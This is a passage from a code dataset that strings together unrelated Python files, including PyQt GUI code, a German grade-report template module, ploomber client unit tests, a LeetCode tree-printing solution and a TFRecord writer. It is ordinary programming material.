        self.parameter_values[i].deleteLater()
        self.parameter_descriptions[i].deleteLater()
    plan_key = self.comboBox_scan_type.currentText()
    plan_func = self.plan_funcs[plan_key]
    # Introspect the plan's signature to create fresh editor widgets.
    [self.parameter_values, self.parameter_descriptions, self.parameter_types] = parse_plan_parameters(plan_func)
    for i in range(len(self.parameter_values)):
        self.gridLayout_parameters.addWidget(self.parameter_values[i], i, 0, QtCore.Qt.AlignTop)
        self.gridLayout_parameters.addWidget(self.parameter_descriptions[i], i, 1, QtCore.Qt.AlignTop)
    # The step-scan group box only applies to non-emission step scans.
    if plan_key.lower().startswith('step scan') and (not 'emission' in plan_key.lower()):
        self.groupBox_stepscan.setEnabled(True)
    else:
        self.groupBox_stepscan.setEnabled(False)
    if plan_key.lower().startswith('johann emission'):
        motor_emission = self.motor_dictionary['motor_emission']['object']
        # Emission scans are only runnable once the spectrometer motor is
        # initialized; widgets 4/5 appear to be the energy limits — TODO confirm.
        if motor_emission._initialized:
            self.push_run_scan.setEnabled(True)
            self.push_run_test_scan.setEnabled(True)
            self.parameter_values[4].setValue(motor_emission.energy.limits[0])
            self.parameter_values[5].setValue(motor_emission.energy.limits[1])
        else:
            self.push_run_scan.setEnabled(False)
            self.push_run_test_scan.setEnabled(False)
    else:
        self.push_run_scan.setEnabled(True)
        self.push_run_test_scan.setEnabled(True)
def draw_interpolated_data(self, df):
    """Plot transmission, total fluorescence and reference traces from an
    interpolated dataframe onto the three stacked axes.

    `df` is expected to be a mapping/DataFrame with an 'energy' column
    plus any of i0/it/iff/ir. Each trace is only drawn when its columns
    are present (the original raised NameError for partial data because
    the arrays were computed conditionally but plotted unconditionally).
    """
    update_figure([self.figure.ax2, self.figure.ax1, self.figure.ax3], self.toolbar, self.canvas)
    if 'energy' not in df:
        # Nothing can be plotted without an energy axis.
        self.canvas.draw_idle()
        return
    energy = np.array(df['energy'])
    # Trim ~2% off each end to hide interpolation edge artifacts.
    edge = int(len(energy) * 0.02)
    # Guard against edge == 0: [0:-0] would be an empty slice.
    trim = slice(edge, -edge) if edge > 0 else slice(None)
    if 'i0' in df and 'it' in df:
        transmission = np.array(np.log(df['i0'] / df['it']))
        self.figure.ax1.plot(energy[trim], transmission[trim], color='r', label='Transmission')
        self.figure.ax1.legend(loc=2)
    if 'i0' in df and 'iff' in df:
        fluorescence = np.array(df['iff'] / df['i0'])
        self.figure.ax2.plot(energy[trim], fluorescence[trim], color='g', label='Total fluorescence')
        self.figure.ax2.legend(loc=1)
    if 'it' in df and 'ir' in df:
        reference = np.array(np.log(df['it'] / df['ir']))
        self.figure.ax3.plot(energy[trim], reference[trim], color='b', label='Reference')
        self.figure.ax3.legend(loc=3)
    self.canvas.draw_idle()
def update_E0(self, text):
    """Slot for the E0 line-edit: cache the new value and persist settings."""
    self.e0 = text
    # print('saving settings')
    self._save_step_scan_settings()
def update_edge(self, text):
    """Slot for the edge combo box: cache the newly selected edge name."""
    # print(text)
    self.edge = text
    # self._save_step_scan_settings()
def update_element(self, text):
    """Slot for the element combo box: cache the newly selected element."""
    self.element = text
    # self._save_step_scan_settings()
def get_info_from_autopilot(self):
    """Copy the selected autopilot sample's name and comment into the
    scan-name (parameter 0) and comment (parameter 1) widgets."""
    sample_df = self.parent.widget_batch_mode.widget_autopilot.sample_df
    sample_number = self.comboBox_autopilot_sample_number.currentIndex()
    # name = sample_df.iloc[sample_number]['Sample label']
    name = sample_df.iloc[sample_number]['Name']
    comment = sample_df.iloc[sample_number]['Composition'] + ' ' + sample_df.iloc[sample_number]['Comment']
    # '/' would break file paths derived from the scan name — presumably; verify.
    name = name.replace('/','_')
    self.parameter_values[0].setText(name)
    self.parameter_values[1].setText(comment)
| StarcoderdataPython |
6591183 | # -*- coding: utf-8 -*-
"""
local/grade_template.py
Last updated: 2021-03-29
Manage template-specific fields for grade reports.
=+LICENCE=============================
Copyright 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=-LICENCE========================================
"""
### Messages
# Error text for an unknown report type (German: "invalid report type").
_INVALID_RTYPE = "Ungültiger Zeugnistyp: '{rtype}'"
# Error text for an invalid qualification entry for a pupil.
_INVALID_QUALI = "Ungültiges Qualifikationsfeld für Schüler {pid}: '{quali}'"
from core.base import Dates
from local.grade_config import GradeConfigError, STREAMS, GradeBase
# Promotion notices: 11 -> Qualifikationsphase (12), and 12 -> 13.
VERSETZUNG_11_12 = "Durch Konferenzbeschluss vom {grades_d} in die" \
        " Qualifikationsphase versetzt."
VERSETZUNG_12_13 = "Durch Konferenzbeschluss vom {grades_d} in die" \
        " 13. Klasse versetzt."
# Attendance sentence for year 12 of the qualification phase.
QP12_TEXT = "hat den 12. Jahrgang der Qualifikationsphase vom {vom}" \
        " bis zum {bis} besucht."
# "Equivalence" notices: this report counts as the named SekI certificate.
GS_TEXT = {
    'HS': "Dieses Zeugnis ist dem Sekundarabschluss I – Hauptschulabschluss" \
            " gleichgestellt. Es vermittelt die gleiche Berechtigung wie" \
            " das Zeugnis über den Sekundarabschluss I – Hauptschulabschluss.",
    'RS': "Dieses Zeugnis ist dem Sekundarabschluss I – Realschulabschluss" \
            " gleichgestellt. Es vermittelt die gleiche Berechtigung wie" \
            " das Zeugnis über den Sekundarabschluss I – Realschulabschluss.",
    'Erw': "Dieses Zeugnis ist dem Erweiterten Sekundarabschluss I" \
            " gleichgestellt. Es vermittelt die gleiche Berechtigung wie" \
            " das Zeugnis über den Erweiterten Sekundarabschluss I."
}
# Names of the SekI leaving certificates, keyed by qualification code.
SEKI_TEXT = {
    'HS': "Sekundarabschluss I – Hauptschulabschluss",
    'RS': "Sekundarabschluss I – Realschulabschluss",
    'Erw': "Erweiterter Sekundarabschluss I"
}
# Placeholder printed in the comment field when there is no comment.
_NOCOMMENT = '––––––––––'
def info_extend(grade_map):
    """Add template-specific fields to *grade_map* in place.

    Dispatches on grade_map['REPORT_TYPE'] ('Zeugnis', 'Abschluss',
    'Abgang', 'Abi'/'X'/'FHS', 'Orientierung') and fills in promotion
    notices, equivalence texts, attendance sentences etc. Raises
    GradeConfigError for an unknown report type or qualification.
    """
    def set_field(field):
        """If there is a configuration value for the given field, set it.
        Return the "tag", if there is a "tag/" prefix, otherwise the value.
        """
        try:
            val = GradeBase.term_info(term, field)
        except GradeConfigError:
            # No configuration entry for this field in this term.
            return None
        try:
            tag, val = val.split('/', 1)
        except ValueError:
            # No '/' separator: the whole value doubles as the tag.
            tag = val
        grade_map[field] = val
        return tag
    #
    term = grade_map['TERM']
    HJ = set_field('HJ')  # half-year marker, presumably '1'/'2' — TODO confirm config
    stream = grade_map['STREAM']
    grade_map['LEVEL'] = STREAMS[stream] # Only relevant for SekI
    rtype = grade_map['REPORT_TYPE']
    if rtype == 'Zeugnis':
        if grade_map['SekII']:
            grade_map['QP12'] = ''
            if HJ == '2':
                # End of year 12: add the attendance sentence.
                grade_map['QP12'] = QP12_TEXT.format(
                        vom = grade_map['QUALI_D'],
                        bis = grade_map['ISSUE_D'])
                if grade_map['*Q'] == 'Erw':
                    # Versetzung 12.Gym -> 13.Gym
                    comment = grade_map['COMMENT']
                    newcomment = VERSETZUNG_12_13.format(
                            grades_d = grade_map['GRADES_D'])
                    if comment:
                        newcomment += '\n' + comment
                    grade_map['COMMENT'] = newcomment
        else:
            Z = set_field('Zeugnis')
            if Z:
                grade_map['ZEUGNIS'] = Z.upper()
            # Versetzung 11.Gym -> 12.Gym
            if (stream == 'Gym' and HJ == '2'
                    and grade_map['CLASS'] == '11'
                    and grade_map['*Q'] == '12'):
                comment = grade_map['COMMENT']
                newcomment = VERSETZUNG_11_12.format(
                        grades_d = grade_map['GRADES_D'])
                if comment:
                    newcomment += '\n' + comment
                grade_map['COMMENT'] = newcomment
        grade_map['NOCOMMENT'] = '' if grade_map['COMMENT'] else _NOCOMMENT
    elif rtype == 'Abschluss':
        q = grade_map['*Q']
        if q == 'Erw' and grade_map['CYEAR'] == '11':
            q = 'RS' # 'Erw' not possible in class 11
        try:
            grade_map['SEKI'] = SEKI_TEXT[q] # SekI 'Abschluss' only
        except KeyError as e:
            raise GradeConfigError(_INVALID_QUALI.format(
                    pid = grade_map['PID'], quali = q or '')) from e
        grade_map['NOCOMMENT'] = '' if grade_map['COMMENT'] else _NOCOMMENT
    elif rtype == 'Abgang':
        # Leaving report: attach the appropriate equivalence notice.
        if grade_map['SekII']:
            if grade_map['CYEAR'] == '12':
                grade_map['QP12'] = QP12_TEXT.format(
                        vom = grade_map['QUALI_D'],
                        bis = grade_map['ISSUE_D'])
            grade_map['GS'] = GS_TEXT['HS']
            if HJ == '2':
                try:
                    grade_map['GS'] = GS_TEXT[grade_map['*Q']]
                except KeyError:
                    # No better equivalence available; keep the HS text.
                    pass
        else:
            grade_map['GSVERMERK'] = ''
            grade_map['GS'] = ''
            # Gleichstellungsvermerk
            klass = grade_map['CYEAR']
            q = grade_map['*Q']
            if (klass == '10' and HJ == '2') or klass in ('11', '12'):
                if q in ('Erw', '12', 'RS', 'HS'):
                    grade_map['GS'] = GS_TEXT['HS'] # only HS-Abschluss
                    grade_map['GSVERMERK'] = "Gleichstellungsvermerk"
    elif rtype in ('Abi', 'X', 'FHS'):
        grade_map['FrHr'] = 'Herr' if grade_map['SEX'] == 'm' else 'Frau'
        grade_map['FERTIG_D'] = Dates.print_date(grade_map['*F_D'])
    elif rtype != 'Orientierung':
        raise GradeConfigError(_INVALID_RTYPE.format(rtype = rtype))
    grade_map['NOCOMMENT'] = '' if grade_map['COMMENT'] else _NOCOMMENT
| StarcoderdataPython |
9628677 | import subprocess
import sqlite3
import pickle
import copy
from pathlib import Path
from urllib.parse import urlparse
from unittest.mock import MagicMock, Mock
from subprocess import CalledProcessError
import paramiko
import pytest
from ploomber import DAG
from ploomber.tasks import ShellScript
from ploomber.products import File
from ploomber.clients import (ShellClient, SQLAlchemyClient, DBAPIClient,
RemoteShellClient)
from ploomber.clients import db, shell
def test_deepcopy_dbapiclient(tmp_directory):
    # A DBAPIClient with an open connection must survive copy.deepcopy.
    client = DBAPIClient(sqlite3.connect, dict(database='my_db.db'))
    client.execute('CREATE TABLE my_table (num INT)')
    assert copy.deepcopy(client)
def test_pickle_dbapiclient(tmp_directory):
    # A DBAPIClient with an open connection must be picklable.
    client = DBAPIClient(sqlite3.connect, dict(database='my_db.db'))
    client.execute('CREATE TABLE my_table (num INT)')
    assert pickle.dumps(client)
def test_dbapiclient_split_source(tmp_directory):
    # With split_source=';', multi-statement strings are executed one
    # statement at a time (sqlite rejects multi-statement execute).
    client = DBAPIClient(sqlite3.connect,
                         dict(database='my_db.db'),
                         split_source=';')
    client.execute("""DROP TABLE IF EXISTS my_table;
    CREATE TABLE my_table (num INT)""")
    assert pickle.dumps(client)
def test_dbapiclient_split_source_custom_char(tmp_directory):
    # split_source accepts an arbitrary separator string, not just ';'.
    client = DBAPIClient(sqlite3.connect,
                         dict(database='my_db.db'),
                         split_source='##')
    client.execute("""DROP TABLE IF EXISTS my_table##
    CREATE TABLE my_table (num INT)""")
    assert pickle.dumps(client)
def test_deepcopy_sqlalchemyclient(tmp_directory):
    # A SQLAlchemyClient with a live engine must survive copy.deepcopy.
    client = SQLAlchemyClient('sqlite:///my_db.db')
    client.execute('CREATE TABLE my_table (num INT)')
    assert copy.deepcopy(client)
def test_pickle_sqlalchemyclient(tmp_directory):
    # A SQLAlchemyClient with a live engine must be picklable.
    client = SQLAlchemyClient('sqlite:///my_db.db')
    client.execute('CREATE TABLE my_table (num INT)')
    assert pickle.dumps(client)
def test_custom_create_engine_kwargs(monkeypatch):
    # create_engine must receive the extra keyword arguments verbatim.
    mock = Mock()
    monkeypatch.setattr(db, 'create_engine', mock)
    client = SQLAlchemyClient('sqlite:///my_db.db',
                              create_engine_kwargs=dict(key='value'))
    # trigger call to create_engine (engine is created lazily)
    client.engine
    mock.assert_called_once_with('sqlite:///my_db.db', key='value')
@pytest.mark.parametrize(
    'code,split_source',
    [['CREATE TABLE my_table (num INT); SELECT * FROM my_table', 'default'],
     ['CREATE TABLE my_table (num INT); SELECT * FROM my_table', ';'],
     ['CREATE TABLE my_table (num INT)## SELECT * FROM my_table', '##']])
def test_send_more_than_one_command_in_sqlite(code, split_source,
                                              tmp_directory):
    # sqlite cannot run multi-statement strings; the client must split
    # them on the configured separator ('default' uses the built-in one).
    client = SQLAlchemyClient('sqlite:///my_db.db', split_source=split_source)
    client.execute(code)
def test_safe_uri():
    # safe_uri must mask the password but leave the rest of the URI intact.
    # with password
    res = db.safe_uri(urlparse('postgresql://user:pass@localhost/db'))
    assert res == 'postgresql://user:********@localhost/db'
    # no password
    res = db.safe_uri(urlparse('postgresql://user@localhost/db'))
    assert res == 'postgresql://user@localhost/db'
# TODO: some of the following tests no longer need tmp_directory because
# they use mock and files are no longer created
@pytest.mark.parametrize('run_template', [None, 'ruby {{path_to_code}}'])
def test_shell_client_execute(run_template, tmp_directory, monkeypatch):
    # execute() must write the code to a temp file and run it with the
    # interpreter from run_template (defaulting to bash).
    if run_template:
        client = ShellClient(run_template=run_template)
        expected_command = run_template.split(' ')[0]
    else:
        client = ShellClient()
        expected_command = 'bash'
    code = """
    echo 'hello'
    """
    mock_res = Mock()
    mock_res.returncode = 0
    mock_run_call = Mock(return_value=mock_res)
    monkeypatch.setattr(shell.subprocess, 'run', mock_run_call)
    # prevent tmp file from being removed so we can check contents
    monkeypatch.setattr(shell.Path, 'unlink', Mock())
    client.execute(code)
    cmd, path = mock_run_call.call_args[0][0]
    assert cmd == expected_command
    assert Path(path).read_text() == code
def test_shell_client_tmp_file_is_deleted(tmp_directory, monkeypatch):
    # execute() must remove the temporary script it wrote (unlink called).
    client = ShellClient()
    code = """
    echo 'hello'
    """
    mock_unlink = Mock()
    monkeypatch.setattr(shell.Path, 'unlink', mock_unlink)
    mock_res = Mock()
    mock_res.returncode = 0
    mock_run_call = Mock(return_value=mock_res)
    monkeypatch.setattr(shell.subprocess, 'run', mock_run_call)
    client.execute(code)
    mock_unlink.assert_called_once()
def test_task_level_shell_client(tmp_directory, monkeypatch):
    # A client registered at the DAG level for ShellScript must be the one
    # used to execute the task's rendered source.
    path = Path(tmp_directory, 'a_file')
    dag = DAG()
    client = ShellClient(run_template='ruby {{path_to_code}}')
    dag.clients[ShellScript] = client
    ShellScript("""
    require 'fileutils'
    FileUtils.touch "{{product}}"
    """,
                product=File(path),
                dag=dag,
                name='ruby_script')
    mock = Mock(wraps=client.execute)
    monkeypatch.setattr(client, 'execute', mock)
    mock_res = Mock()
    mock_res.returncode = 0

    def side_effect(*args, **kwargs):
        # Fake a successful run by creating the product file.
        Path('a_file').touch()
        return mock_res

    mock_run_call = Mock(side_effect=side_effect)
    monkeypatch.setattr(shell.subprocess, 'run', mock_run_call)
    # prevent tmp file from being removed so we can check contents
    monkeypatch.setattr(shell.Path, 'unlink', Mock())
    dag.build()
    mock.assert_called_once()
    cmd, path_arg = mock_run_call.call_args[0][0]
    kwargs = mock_run_call.call_args[1]
    # The {{product}} placeholder must have been rendered into the script.
    expected_code = """
    require 'fileutils'
    FileUtils.touch "{path}"
    """.format(path=path)
    assert cmd == 'ruby'
    assert Path(path_arg).read_text() == expected_code
    assert kwargs == {
        'stderr': subprocess.PIPE,
        'stdout': subprocess.PIPE,
        'shell': False
    }
def test_db_code_split():
    # Trailing separators/newlines must not yield empty statements.
    assert list(db.code_split('a;b;c;')) == ['a', 'b', 'c']
    assert list(db.code_split('a;b;c;\n')) == ['a', 'b', 'c']
def test_remote_shell(monkeypatch):
    # Fake a paramiko SSH client whose command reports success (exit 0).
    fake_client = MagicMock(spec=paramiko.SSHClient)
    stdout = MagicMock()
    stdout.readline = lambda: ''
    stdout.channel.recv_exit_status.return_value = 0
    fake_client.exec_command.return_value = 'input', stdout, 'err'
    sftp = MagicMock()
    fake_client.open_sftp.return_value = sftp
    monkeypatch.setattr(paramiko, 'SSHClient', lambda: fake_client)
    client = RemoteShellClient(connect_kwargs={}, path_to_directory='/tmp')
    client.execute('some code')
    # execute() must upload the code via sftp and run it over ssh.
    fake_client.open_sftp.assert_called_once()
    fake_client.exec_command.assert_called_once()
    sftp.put.assert_called_once()
    sftp.close.assert_called_once()
    client.close()
    fake_client.close.assert_called_once()
def test_remote_shell_error(monkeypatch):
    # A non-zero remote exit status must raise CalledProcessError.
    fake_client = MagicMock(spec=paramiko.SSHClient)
    stdout = MagicMock()
    stdout.readline = lambda: ''
    stdout.channel.recv_exit_status.return_value = 1
    fake_client.exec_command.return_value = 'input', stdout, 'err'
    sftp = MagicMock()
    fake_client.open_sftp.return_value = sftp
    monkeypatch.setattr(paramiko, 'SSHClient', lambda: fake_client)
    client = RemoteShellClient(connect_kwargs={}, path_to_directory='/tmp')
    with pytest.raises(CalledProcessError):
        client.execute('some code')
def test_remote_shell_read_file(monkeypatch, tmp_directory):
    """read_file must download the remote file via sftp into a temp file
    and return its contents, then close the sftp session."""
    mock_ssh_client = Mock(spec=paramiko.SSHClient)
    monkeypatch.setattr(shell, 'ssh_client_and_policy', lambda:
                        (mock_ssh_client, Mock()))
    monkeypatch.setattr(shell.tempfile, 'mkstemp', lambda:
                        (None, 'my_tmp_file'))
    monkeypatch.setattr(shell.os, 'close', lambda _: None)
    # Simulate the sftp download by writing the "remote" content locally.
    mock_ssh_client.open_sftp().get.side_effect = lambda x, y: Path(
        'my_tmp_file').write_text('some content')
    # reset to prevent counting the "call" from the previous line
    mock_ssh_client.open_sftp.reset_mock()
    client = RemoteShellClient(connect_kwargs={}, path_to_directory='/tmp')
    returned_content = client.read_file('/path/to/remote/file')
    assert returned_content == 'some content'
    mock_ssh_client.open_sftp.assert_called_once()
    ftp = client.connection.open_sftp()
    # BUG FIX: the original wrote
    #   assert ftp.get.call_args.assert_called_with(...)
    # Attribute access on a mock `call` object just builds another (truthy)
    # call object, so that assert always passed without checking anything.
    ftp.get.assert_called_with('/path/to/remote/file', 'my_tmp_file')
    ftp.close.assert_called_once()
def test_remote_shell_write_to_file(monkeypatch, tmp_directory):
    """write_to_file must stage the content in a temp file, upload it via
    sftp to the target path, and close the sftp session."""
    mock_ssh_client = Mock(spec=paramiko.SSHClient)
    monkeypatch.setattr(shell, 'ssh_client_and_policy', lambda:
                        (mock_ssh_client, Mock()))
    monkeypatch.setattr(shell.tempfile, 'mkstemp', lambda:
                        (None, 'my_tmp_file'))
    monkeypatch.setattr(shell.os, 'close', lambda _: None)
    monkeypatch.setattr(shell.Path, 'unlink', lambda _: None)
    client = RemoteShellClient(connect_kwargs={}, path_to_directory='/tmp')
    client.write_to_file('content', '/path/to/remote/file')
    mock_ssh_client.open_sftp.assert_called_once()
    ftp = client.connection.open_sftp()
    assert Path('my_tmp_file').read_text() == 'content'
    # BUG FIX: the original `assert ftp.put.call_args.assert_called_with(...)`
    # never verified the call (see test_remote_shell_read_file); assert the
    # mock call directly instead.
    ftp.put.assert_called_with('my_tmp_file', '/path/to/remote/file')
    ftp.close.assert_called_once()
| StarcoderdataPython |
6668449 | from __future__ import unicode_literals
import sys
from PyQt4 import QtGui, QtCore
from PyQt4.QtCore import Qt
from PyQt4.QtGui import (QComboBox, QDialog, QTableWidgetItem, QTableWidget, QWizard)
#import lasio.pylasdev.las_reader
import logging
import sqlite3
import totaldepth.PlotLogs
import inout.las.reader.ui.logtablemodel as logtablemodel
from db.databasemanager import DM
from db.core.well.well import Well
from inout.las.reader.lasreader import LasReader
from inout.las.reader.ui.notepad import Notepad
from statics.types.logtype import LogType
from statics.types.logunitstype import LogUnitsType
from inout.las.reader.ui.wizard.ui_importlaswizard import Ui_Wizard
from inout.las.reader.ui.wizard.importlaswizardpage import ImportLasWizardPage
from inout.las.reader.ui.wizard.welllaswizardpage import WellLasWizardPage
from inout.las.reader.ui.wizard.logservicewizardpage import LogServiceWizardPage
from inout.las.reader.ui.wizard.parameterlaswizardpage import ParameterLasWizardPage
from inout.las.reader.orm.laspersister import LasPersister
logger = logging.getLogger('console')
class ImportLasWizard(QWizard, Ui_Wizard):
    '''Wizard for importing logs from .las file.

    Reads the file with LasReader, presents one wizard page per data
    section (logs, well, services, parameters), and persists everything
    through LasPersister when the user clicks Finish.
    '''
    # Class-level default; bool() is False. Shadowed per-instance in __init__.
    _wellExistsInDB = bool()

    def __init__(self, fileName, parent=None):
        """Build the wizard for *fileName*; pages are only added when the
        file yields a non-empty log list."""
        logger.debug("__init__() " + str(fileName))
        super(ImportLasWizard, self).__init__(parent)
        self.setObjectName("importLasWizard")
        # default wizard anyway
        # self.setupUi(self)
        # holder for radio button selection state - instead of registerField
        self._importAllData = False
        self._wellExistsInDB = False
        # if error saving an object quit wizard
        self._errorOnSave = False
        self._reader = LasReader()
        self._fileName = fileName
        self._session = DM.getSession()
        self.checkIfWellExistsInDB()
        self.setWindowTitle("Import .las data wizard")
        self.resize(640, 480)
        # slot handling the next button, but disconnect the default slot first
        # see http://stackoverflow.com/questions/11155494/handling-cancellation-on-a-wizard-page
        # self.disconnect(self.button(QWizard.NextButton), QtCore.SIGNAL('clicked()'), self, QtCore.SLOT('next()'))
        if fileName is not None:
            # plotter=totaldepth.PlotLogs
            # plotter.mockPlot()
            self.readFile()
            # las_info = lasio.pylasdev.las_reader.read_las_file(str(fileName))
            if len(self._reader.logList) == 0:
                self.NextButton.setEnabled(False)
                self.BackButton.setEnabled(False)
                logger.info("Cannot populate dialog, log list is empty")
            else:
                # One page per data section of the .las file.
                self.addPage(ImportLasWizardPage(self._reader.logList, self))
                self.addPage(WellLasWizardPage(self._reader.well, self))
                self.addPage(LogServiceWizardPage(self._reader, self))
                self.addPage(ParameterLasWizardPage(self._reader, self))
        else:
            logger.info("Cannot populate dialog, filename is empty")
        self.connectSlots()

    def readFile(self):
        """Run the three-part LasReader job with a busy cursor shown."""
        logger.debug(">>readFile()")
        # start main ui progress bar to busy
        QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
        ok = self._reader.readJobPart1(self._fileName)
        ok = self._reader.readJobPart2()
        ok = self._reader.readJobPart3()
        QtGui.QApplication.restoreOverrideCursor()
        # set main ui progress bar to finished then zero
        # test
        # logList = self._reader.logList
        # for log in logList:
        #     logger.debug("--readFile(): "+str(log.name)+" "+str(log.type_)+" "+str(log.unit)+" "+str(log.fileUnit))
        # logger.debug("--readFile(): "+str(self._fileName)+" well name: "+str(wellDTO.well_name))
        # end test

    def connectSlots(self):
        """Wire the Next/Finish buttons to the save handlers."""
        logger.debug(">>connectSlots()")
        self.button(QWizard.NextButton).clicked.connect(self.saveOnNext)
        self.button(QWizard.FinishButton).clicked.connect(self.finishClicked)

    def initializePage(self, i):
        # QWizard hook; only logged here, pages initialize themselves.
        logger.debug("Initializing page..." + str(i))

    def saveOnNext(self):
        """Persist the page the user just left (currentId has already
        advanced when this slot runs, hence the -1)."""
        logger.debug(">>saveOnNext()")
        try:
            # currentId has already been incremented when here
            page = self.page(self.currentId() - 1)
            logger.debug(str("--saveOnNext() name: " + page.objectName()))
            page.populateObject()
        except:
            logger.error("Could not save page " + str(self.currentId() - 1))
            self._errorOnSave = True

    def finishClicked(self):
        """Persist the final page, write everything through LasPersister
        and notify the rest of the app that the database changed."""
        logger.debug(">>finishClicked()")
        # Save the finish page (Parameters atm)
        try:
            # Note that Id has not been incremented unlike Next
            page = self.page(self.currentId())
            logger.debug(str("--saveOnNext() name: " + page.objectName()))
            page.populateObject()
            # TODO start main ui progress bar to busy
            lasPersister = LasPersister(self._session)
            lasPersister.dispatchDataWriters(self._reader, True)
            if lasPersister.committedOK:
                # send signal for tree update
                DM.databaseModified()
            self._session.close()
        except:
            logger.error("Could not save page " + str(self.currentId()))
            self._errorOnSave = True
        finally:
            self._session.close()

    def checkIfWellExistsInDB(self):
        ''' Need a well object in database before can query against child tables '''
        try:
            rs = self._session.query(Well, Well.id).all()
            if rs:
                self._wellExistsInDB = True
        except sqlite3.OperationalError as e:
            # e.g. the wells table does not exist yet in a fresh database.
            logger.error(str(e))
| StarcoderdataPython |
12832716 | # 023
# Ask the user to type in the first line of a nursery rhyme and display
# the length of the string. Ask for a starting number and an
# ending number and then display just that section of the text
# (remember Python starts counting from 0 and not 1).
# Prompt loop: keeps asking until a rhyme line and a valid start/end pair
# have been processed without raising.
rhyme = list()  # falsy until the user has entered a line (then it is a str)
while True:
    try:
        if not rhyme:
            rhyme = input('Please enter the first line of a nursery '
                          'rhyme: ')
            print(f'There are {len(rhyme)} characters in that line')
        from_to = input('Please type in the starting character'
                        'you want to the final character: ')
        from_to = from_to.split(' ')
        # Convert both bounds to int; a non-numeric entry raises and re-loops.
        for index, value in enumerate(from_to):
            from_to[index] = int(value)
        # NOTE(review): slice is [start-1 : end+1] — a 1-based start with an
        # inclusive end shifted by one; confirm against the exercise intent.
        print(rhyme[from_to[0] - 1:from_to[1] + 1])
        break
    except Exception as e:
        print(e)
8079317 | #655. Print Binary Tree
class TreeNode:
    # Minimal binary-tree node: a value plus optional left/right children.
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right
class Solution:
    def printTree(self, root):
        """Return the (height+1) x (2**(height+1)-1) layout matrix for the
        tree rooted at `root` (LeetCode 655), or None for an empty tree.

        The root sits in the middle of row 0; each child is placed
        2**(height-row-1) columns to the side of its parent. Uses pure
        integer arithmetic (the original used float division and pow(),
        which loses precision for very deep trees and required int()
        casts on every index).
        """
        if root is None:
            return None

        def max_depth(node):
            # Number of nodes on the longest root-to-leaf path.
            if node is None:
                return 0
            return max(max_depth(node.left), max_depth(node.right)) + 1

        height = max_depth(root) - 1
        cols = 2 ** (height + 1) - 1
        res = [["" for _ in range(cols)] for _ in range(height + 1)]

        def fill(node, row, col):
            if node is None:
                return
            res[row][col] = str(node.val)
            if row < height:  # leaves have no children to place
                offset = 1 << (height - row - 1)
                fill(node.left, row + 1, col - offset)
                fill(node.right, row + 1, col + offset)

        fill(root, 0, (cols - 1) // 2)
        return res
"""
Given the root of a binary tree, construct a 0-indexed m x n string matrix res that represents a formatted layout of the tree. The formatted layout matrix should be constructed using the following rules:
The height of the tree is height and the number of rows m should be equal to height + 1.
The number of columns n should be equal to 2height+1 - 1.
Place the root node in the middle of the top row (more formally, at location res[0][(n-1)/2]).
For each node that has been placed in the matrix at position res[r][c], place its left child at res[r+1][c-2height-r-1] and its right child at res[r+1][c+2height-r-1].
Continue this process until all the nodes in the tree have been placed.
Any empty cells should contain the empty string "".
Return the constructed matrix res.
Input: root = [1,2]
Output:
[["","1",""],
["2","",""]]
Input: root = [1,2,3,null,4]
Output:
[["","","","1","","",""],
["","2","","","","3",""],
["","","4","","","",""]]
"""
| StarcoderdataPython |
3549879 | <filename>code/convert_to_record.py
import tensorflow as tf
def _int64_feature(value):
    # Wrap a scalar int in a tf.train.Feature (int64_list of length 1).
    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
    # Wrap a bytes value in a tf.train.Feature (bytes_list of length 1).
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def data_to_record(data, label, writer):
    """Serialize one (data, label) pair as a tf.train.Example and write it.

    `data` is an array of shape (height, width, channels); both arrays are
    stored as raw bytes plus the image dimensions, so the reading side
    must know the dtypes to reconstruct them — TODO confirm reader side.
    """
    h, w, c = data.shape
    data_raw = data.tostring()
    label_raw = label.tostring()
    example = tf.train.Example(features=tf.train.Features(feature={
        'height': _int64_feature(h),
        'width': _int64_feature(w),
        'depth': _int64_feature(c),
        'label': _bytes_feature(label_raw),
        'data': _bytes_feature(data_raw)
    }))
    writer.write(example.SerializeToString())
| StarcoderdataPython |
8091255 | import pytest
from matryoshka_tester.helpers import ContainerBuild
@pytest.mark.parametrize(
    "dockerfile_build",
    (
        # One build fixture per sample project; each clones a pinned tag
        # before the container build runs.
        build.to_pytest_param()
        for build in (
            ContainerBuild(
                name="amidst",
                pre_build_steps=(
                    "git clone -b v4.6 "
                    "https://github.com/toolbox4minecraft/amidst"
                ),
            ),
            ContainerBuild(
                name="maven",
                pre_build_steps=(
                    "git clone -b maven-3.8.1 https://github.com/apache/maven"
                ),
                marks=pytest.mark.xfail(
                    reason="environment variables are not set correctly"
                ),
            ),
            ContainerBuild(
                name="pdftk",
                pre_build_steps=(
                    "git clone -b v3.2.2 "
                    "https://gitlab.com/pdftk-java/pdftk.git"
                ),
            ),
            ContainerBuild(
                name="k3sup",
                pre_build_steps=(
                    "git clone -b 0.10.2 https://github.com/alexellis/k3sup"
                ),
            ),
        )
    ),
    indirect=["dockerfile_build"],
)
def test_dockerfile_build(host, container_runtime, dockerfile_build):
    # Build the project's Dockerfile, then run the resulting image once
    # to make sure it starts successfully.
    cmd = host.run_expect([0], container_runtime.build_command)
    img_id = container_runtime.get_image_id_from_stdout(cmd.stdout)
    host.run_expect(
        [0], f"{container_runtime.runner_binary} run --rm {img_id}"
    )
| StarcoderdataPython |
6570318 | <gh_stars>0
"""
Language detection using n-grams
"""
import re
from math import log
from statistics import mean
# 4
def tokenize_by_sentence(text: str) -> tuple:
    """
    Splits a text into sentences, sentences into tokens, tokens into letters
    Tokens are framed with '_'
    :param text: a text
    :return: a tuple of sentence with tuples of tokens split into letters
    e.g.
    text = 'She is happy. He is happy.'
    -->  (
         (('_', 's', 'h', 'e', '_'), ('_', 'i', 's', '_'), ('_', 'h', 'a', 'p', 'p', 'y', '_')),
         (('_', 'h', 'e', '_'), ('_', 'i', 's', '_'), ('_', 'h', 'a', 'p', 'p', 'y', '_'))
